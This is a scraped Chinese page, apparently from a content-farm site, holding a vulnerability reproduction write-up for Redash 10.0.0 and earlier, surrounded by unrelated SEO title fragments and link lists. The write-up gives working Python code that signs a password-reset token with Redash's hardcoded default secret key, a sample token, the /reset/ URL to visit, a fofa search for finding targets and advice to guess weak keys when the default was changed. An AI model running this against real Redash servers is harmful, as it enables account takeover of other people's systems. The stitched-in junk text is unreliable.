当前位置: 首页 > news >正文

制作网站的软件手机版四川省城乡和住房建设厅网站首页

制作网站的软件手机版,四川省城乡和住房建设厅网站首页,做星座网站,flash 网站Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞#xff0c;攻击者可利用该漏洞来使用已知的默认值伪造会话。 1.漏洞级别 中危 2.漏洞搜索 fofa redash…Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞攻击者可利用该漏洞来使用已知的默认值伪造会话。 1.漏洞级别 中危 2.漏洞搜索 fofa redash3.影响范围 Redash 10.0.04.漏洞复现 漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key如果用户不手动修改的话我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token因此我们可以直接生成一个有效的找回链接。 可以执行如下python代码 from itsdangerous import URLSafeTimedSerializer if __name__ __main__:serializer URLSafeTimedSerializer(c292a0a3aa32397cdb050e233733900f)key serializer.dumps(1)print(key)生成的有效负载 IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18由于生成的有效负载存在过期时间因此每次测试的时候最好重新生成一下。c292a0a3aa32397cdb050e233733900f为默认key。如果用户手动修改了这个key我们也可以尝试使用一些弱口令来生成负载尝试一下。 访问路径 url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18如果出现即为漏洞存在 出现这个表示key已被修改过了 到这里漏洞就复现成功了。 如果有问题欢迎随时沟通
http://www.hkea.cn/news/14317739/

相关文章:

  • ps做登录网站郑州住房和城乡建设局网站
  • 东莞企业网站建设营销广电如何做视频网站
  • 哈尔滨优化调整人员流动管理wordpress 自带seo
  • 坪地网站建设公司wordpress 树状目录
  • 阿里巴巴网站建设策略调研公司网站建设南宁
  • 长沙河东做网站年度考核表个人总结网站建设
  • 帝国cms网站源码做网站的软件有些什么
  • wordpress怎么做网站五大搜索引擎 三大门户网站
  • 上海app开发定制公司邯郸seo优化公司
  • 网站开发 职业环境分析凯里网站开发gzklyy
  • 公司及企业如何建立自己的购物网站官方商城下载
  • 网站设计公司那个好北京东站
  • 网站开发文档需求模板公司网站招聘的作用
  • 做pcr查基因序列的网站门户网站改造方案
  • 徐州集团网站建设方案wordpress2018主题
  • 一级 爰做片免费网站胶南网站建设多少钱
  • 怎么做购物平台网站dw网站设计步骤
  • 网站排名推广怎么做做挖机配件销售的网站
  • 诚信通旺铺网站建设杭州网站建设hzyze
  • 长春网站seo外包中交路建子公司最新排名
  • 网站建设公司上海站霸图片制作成视频
  • 网站制作公司石家庄家居装修公司
  • flash是怎么做网站的湛江h5建站
  • 有关网站开发的文献或论文太原免费静态网页制作网站
  • 旅游网站 源码 织梦怀化网站制作建设
  • 反馈网站怎么做wordpress首页仅显示指定分类文章
  • 微科技h5制作网站济南建设企业网站
  • 网站改版用新空间好吗画册设计说明怎么写
  • 网站开发使用软件环境百度搜索引擎竞价排名
  • 北京免备案网站建设老李网站建设